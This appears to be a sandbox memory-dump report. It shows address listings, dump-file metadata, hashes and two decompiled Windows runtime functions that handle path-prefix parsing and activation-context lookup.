0x1e3c70b7
0x1e3c70b8
0x1e3c70bb
0x1e3c70c2
0x00000000
0x00000000
0x1e3c70c7
0x00000000
0x00000000
0x1e3c70c9
0x1e3c70ca
0x00000000
0x1e3c70ad
0x1e3c70ad
0x1e3c70af
0x00000000
0x1e3c70af
0x1e3c7148
0x1e3c714d
0x1e40f8e2
0x1e40f8e2
0x1e3c7153
0x1e3c7154
0x1e3c7157
0x00000000
0x1e3c7157
0x1e40f87c
0x1e40f87f
0x1e40f882
0x00000000
0x1e40f882
0x1e40f85e
0x00000000
0x00000000
0x1e40f864
0x1e40f869
0x1e40f86c
0x00000000
0x1e40f86c
0x1e3c7168
0x1e3c7170
0x1e40f8d6
0x1e40f8d6
0x1e3c7176
0x1e3c7179
0x00000000
0x1e3c7179
0x1e3c6fe9
0x1e3c6fe9
0x00000000
0x1e3c6fe9
0x1e3c6fbf
0x1e3c6f8c
0x1e3c6f93
0x1e3c72d6
0x00000000
0x00000000
0x00000000
0x1e3c72d6
0x1e3c6f99
0x1e3c6f99
0x1e3c6f99
0x00000000
0x1e3c6f68
0x1e3c6f50
0x1e3c6f56
0x1e3c722c
0x1e40f629
0x1e40f629
0x00000000
0x1e40f629
0x1e3c7232
0x1e3c7239
0x1e40f623
0x00000000
0x00000000
0x00000000
0x1e40f623
0x1e3c723f
0x1e3c7242
0x1e40f64e
0x1e40f64e
0x00000000
0x1e40f64e
0x1e3c7248
0x1e3c724f
0x1e3c7373
0x00000000
0x00000000
0x00000000
0x1e3c7379
0x1e3c7255
0x1e3c7258
0x1e40f63c
0x1e40f648
0x00000000
0x1e40f648
0x1e3c725e
0x1e3c7265
0x1e40f636
0x00000000
0x00000000
0x00000000
0x1e40f636
0x1e3c726b
0x1e3c726b
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c6f56
0x1e3c6f3d
0x1e3c6ed2
0x00000000
0x1e3c6ec4

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
Instruction ID: f20ac5a1e9a6253d37313d1204386e45cc3efbb22e9c79a707fb6e88634d4e77
Opcode Fuzzy Hash: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
Instruction Fuzzy Hash: C2027B71D142698BCB25CFA9C4906ADB7B6BF44700F21436FE816AB294E770DC92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1E3C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1e49d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E1E3DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E1E3C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L1E3C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E1E3C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M1E3C45F8))) {
												case 0:
													_v568 = 0x1e381078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1e3811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L1E3C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E1E3A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E1E3BEB70(1, 0x1e4979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E1E3BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E1E3E95D0();
																			L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E1E3EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E1E3E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E1E3EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x1e3c4128
0x1e3c4135
0x1e3c413c
0x1e3c4141
0x1e3c4145
0x1e3c4147
0x1e3c414e
0x1e3c4151
0x1e3c4159
0x1e3c415c
0x1e3c4160
0x1e3c4164
0x1e3c4168
0x1e3c416c
0x1e3c417f
0x1e3c4181
0x1e3c446a
0x1e3c446a
0x1e3c418c
0x1e3c4195
0x1e3c4199
0x1e3c4432
0x1e3c4439
0x1e3c443d
0x1e3c4442
0x1e3c4447
0x00000000
0x1e3c419f
0x1e3c41a3
0x1e3c41b1
0x1e3c41b9
0x1e3c41bd
0x1e3c45db
0x1e3c45db
0x00000000
0x1e3c41c3
0x1e3c41c3
0x1e3c41ce
0x1e3c41d4
0x1e40e138
0x1e40e13e
0x1e40e169
0x1e40e16d
0x1e40e19e
0x1e40e16f
0x1e40e16f
0x1e40e175
0x1e40e179
0x1e40e18f
0x1e40e193
0x00000000
0x1e40e199
0x00000000
0x1e40e199
0x1e40e193
0x00000000
0x00000000
0x00000000
0x1e3c41da
0x1e3c41da
0x1e3c41df
0x1e3c41e4
0x1e3c41ec
0x1e3c4203
0x1e3c4207
0x1e40e1fd
0x1e3c4222
0x1e3c4226
0x1e40e1f3
0x1e40e1f3
0x1e3c422c
0x1e3c422c
0x1e3c4233
0x1e40e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c4239
0x1e3c4239
0x1e3c4239
0x1e3c4239
0x1e3c4233
0x1e3c4226
0x1e3c41ee
0x1e3c41ee
0x1e3c41f4
0x1e3c4575
0x1e40e1b1
0x1e40e1b1
0x00000000
0x1e3c457b
0x1e3c457b
0x1e3c4582
0x1e40e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c4588
0x1e3c4588
0x1e3c458c
0x1e40e1c4
0x1e40e1c4
0x00000000
0x1e3c4592
0x1e3c4592
0x1e3c4599
0x1e40e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c459f
0x1e3c459f
0x1e3c45a3
0x1e40e1d7
0x1e40e1e4
0x00000000
0x1e3c45a9
0x1e3c45a9
0x1e3c45b0
0x1e40e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c45b6
0x1e3c45b6
0x1e3c45b6
0x00000000
0x1e3c45b6
0x1e3c45b0
0x1e3c45a3
0x1e3c4599
0x1e3c458c
0x1e3c4582
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c41f4
0x1e3c423e
0x1e3c4241
0x1e3c45c0
0x1e3c45c4
0x00000000
0x1e3c45ca
0x1e3c45ca
0x00000000
0x1e40e207
0x1e40e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c45d1
0x00000000
0x00000000
0x1e3c45ca
0x00000000
0x1e3c4247
0x1e3c4247
0x1e3c4247
0x1e3c4249
0x1e3c4249
0x1e3c4249
0x1e3c4251
0x1e3c4251
0x1e3c4257
0x1e3c425f
0x1e3c426e
0x1e3c4270
0x1e3c427a
0x1e40e219
0x1e40e219
0x1e3c4280
0x1e3c4282
0x1e3c4456
0x1e3c45ea
0x00000000
0x1e3c45f0
0x1e40e223
0x00000000
0x1e40e223
0x1e3c445c
0x1e3c445c
0x00000000
0x1e3c445c
0x00000000
0x1e3c4288
0x1e3c428c
0x1e40e298
0x1e3c4292
0x1e3c4292
0x1e3c429e
0x1e3c42a3
0x1e3c42a7
0x1e3c42ac
0x1e40e22d
0x1e3c42b2
0x1e3c42b2
0x1e3c42b9
0x1e3c42bc
0x1e3c42c2
0x1e3c42ca
0x1e3c42cd
0x1e3c42cd
0x1e3c42d4
0x1e3c433f
0x1e3c433f
0x1e3c42d6
0x1e3c42d6
0x1e3c42d9
0x1e3c42dd
0x1e3c42eb
0x1e40e23a
0x1e3c42f1
0x1e3c4305
0x1e3c430d
0x1e3c4315
0x1e3c4318
0x1e3c431f
0x1e3c4322
0x1e3c432e
0x1e3c433b
0x1e3c433b
0x00000000
0x1e3c432e
0x1e3c42eb
0x1e3c434c
0x1e3c434e
0x1e3c4352
0x1e3c4359
0x1e3c435e
0x1e3c4361
0x1e3c436e
0x1e3c438a
0x1e3c438e
0x1e3c4396
0x1e3c439e
0x1e3c43a1
0x1e3c43ad
0x1e3c43bb
0x1e3c43bb
0x1e3c43ad
0x1e3c436e
0x1e3c43bf
0x1e3c43c5
0x1e3c4463
0x1e3c4463
0x1e3c43ce
0x1e3c43d5
0x1e3c43d9
0x1e3c43df
0x1e3c4475
0x1e3c4479
0x1e3c4491
0x1e3c4491
0x1e3c4479
0x1e3c43e5
0x1e3c43eb
0x1e3c43f4
0x1e3c43f6
0x1e3c43f9
0x1e3c43fc
0x1e3c43ff
0x1e3c44e8
0x1e3c44ed
0x1e3c44f3
0x1e40e247
0x00000000
0x1e3c44f9
0x1e3c4504
0x1e3c4508
0x1e3c450f
0x1e40e269
0x00000000
0x1e3c4515
0x1e3c4519
0x1e3c4531
0x1e3c4534
0x1e3c4537
0x1e3c453e
0x1e3c4541
0x1e3c454a
0x1e40e255
0x1e40e255
0x1e40e25b
0x1e40e25e
0x1e40e261
0x1e40e261
0x1e3c4555
0x1e3c4559
0x1e3c455d
0x1e40e26d
0x1e40e270
0x1e40e274
0x1e40e27a
0x1e40e27d
0x1e40e28e
0x1e40e28e
0x1e3c4563
0x1e3c4563
0x1e3c4569
0x1e3c4569
0x00000000
0x1e3c455d
0x1e3c450f
0x00000000
0x1e3c44f3
0x1e3c43ff
0x1e3c4405
0x1e3c4405
0x1e3c4405
0x1e3c42ac
0x1e3c428c
0x1e3c4282
0x1e3c4407
0x1e3c440d
0x1e40e2af
0x1e40e2af
0x1e3c4413
0x1e3c4413
0x00000000
0x1e3c41d4
0x00000000
0x1e3c41c3
0x1e3c41bd
0x1e3c4415
0x1e3c4415
0x1e3c4416
0x1e3c4417
0x1e3c4429
0x1e3c416e
0x1e3c416e
0x1e3c4175
0x1e3c4498
0x1e3c449f
0x1e40e12d
0x00000000
0x1e40e133
0x00000000
0x1e40e133
0x1e3c44a5
0x1e3c44a5
0x1e3c44aa
0x00000000
0x1e3c44bb
0x1e3c44ca
0x1e3c44d6
0x1e3c44d7
0x1e3c44d8
0x1e3c44e3
0x1e3c44e3
0x1e3c44aa
0x1e3c417b
0x1e3c417b
0x1e3c417b
0x00000000
0x1e3c417b
0x1e3c4175
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
Instruction ID: 66d964714607f9c7f8e0cb53d725439a794c054f7944c0576d445e2491f4ab72
Opcode Fuzzy Hash: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
Instruction Fuzzy Hash: 62F15A74A182518BC714CF59C490A6AB7E6FF88714F154A2FF88ACB290E734ED91CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1E3D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1e498714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E1E3D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E1E3D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E1E3A58EC(_t240);
									_t221 =  *0x1e495cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1e495cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E1E3E4A2C(0x1e496e40, 0x1e3e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E1E3C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1e385c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E1E427016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L1E3C2400(_t267 + 0x20);
															}
															L1E3C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E1E3D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E1E3C2280(_t134, 0x1e498608);
									__eflags =  *0x1e496e48 - _t253; // 0x71d418
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E1E3BFFB0(_t198, _t241, 0x1e498608);
										__eflags = _t253;
										if(_t253 != 0) {
											L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1e496e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1e498608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E1E3D6B90(_t210,  &_v64);
										_t262 =  *0x1e498608; // 0x0
										L93:
										_t231 = _t262;
